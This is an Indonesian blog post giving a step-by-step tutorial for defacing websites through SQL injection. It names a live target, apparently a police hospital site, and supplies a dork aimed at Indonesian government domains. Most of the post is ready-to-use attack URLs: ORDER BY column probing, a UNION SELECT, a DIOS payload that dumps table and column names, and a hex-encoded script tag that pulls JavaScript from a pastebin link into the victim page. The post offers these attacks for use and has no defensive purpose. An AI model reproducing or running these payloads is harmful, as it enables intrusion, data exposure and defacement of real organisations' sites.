Sabtu, 07 Maret 2020

Deface Poc SQL with dios - ACT


saya Mr.X-Notfound akan membagikan cara deface SQL chall/dios

•Dork
inurl:/berita.php?id= site.go.id

Yg pertama cari dork boleh apapun karena saya punya live target jadi engga usah

Live target
http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1


Kemudian kasih tanda ' dibelakang syntax live target
Contoh :
http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1'

Jika web tersebut vuln kita akan menemukan error atau gambar yg hilang contoh seperti gambar di atas

Next tmbh kan +order+by+1--+- di belakang web target
Contoh:
http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1%27+order+by+1--+-

(%27 abaikan saja)

Cari sampai error

http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1%27+order+by+1--+-

http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1%27+order+by+2--+-

http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1%27+order+by+3--+-

Dan seterunya

Disini saya error di bagian kolom 10
http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1+order+by+10--+-

Nah lalu kita buat cara seperti ini
Order by ganti dengan union select
Contoh :
http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1%27+union+select+1,2,3,4,5,6,7,8,9,10--+-

Nah ada angka togel tuh, yaitu 2
Nah lalu kita dios deh
Contoh:
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)

Lalu kita pastekan di angka togel td

http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1%27+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),3,4,5,6,7,8,9,10--+-

Jadi gini deh,Keliatan kan DBnya
DB = data base
Lalu mari kita deface
Gua disini make dios deface gua

Klo lu blom ada bs lu pastein sc jso lu di sini
https://www.online-toolz.com/tools/text-hex-convertor.php

Nah klo udh lu msukin di angka togel itu
Contoh dios deface
0x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d2268747470733a2f2f706173746562696e2e636f6d2f7261772f48456b6461374475223e3c2f7363726970743e

Hasil

http://www.rumkitpolrisukanto.com/content/news.php?mid=4&catid=1&nid=1%27+union+select+1,0x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d2268747470733a2f2f706173746562696e2e636f6d2f7261772f48456b6461374475223e3c2f7363726970743e,3,4,5,6,7,8,9,10--+-

Selesai deh
Sekian dr saya wassalamualaikum wr.wb
Diposting oleh di

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)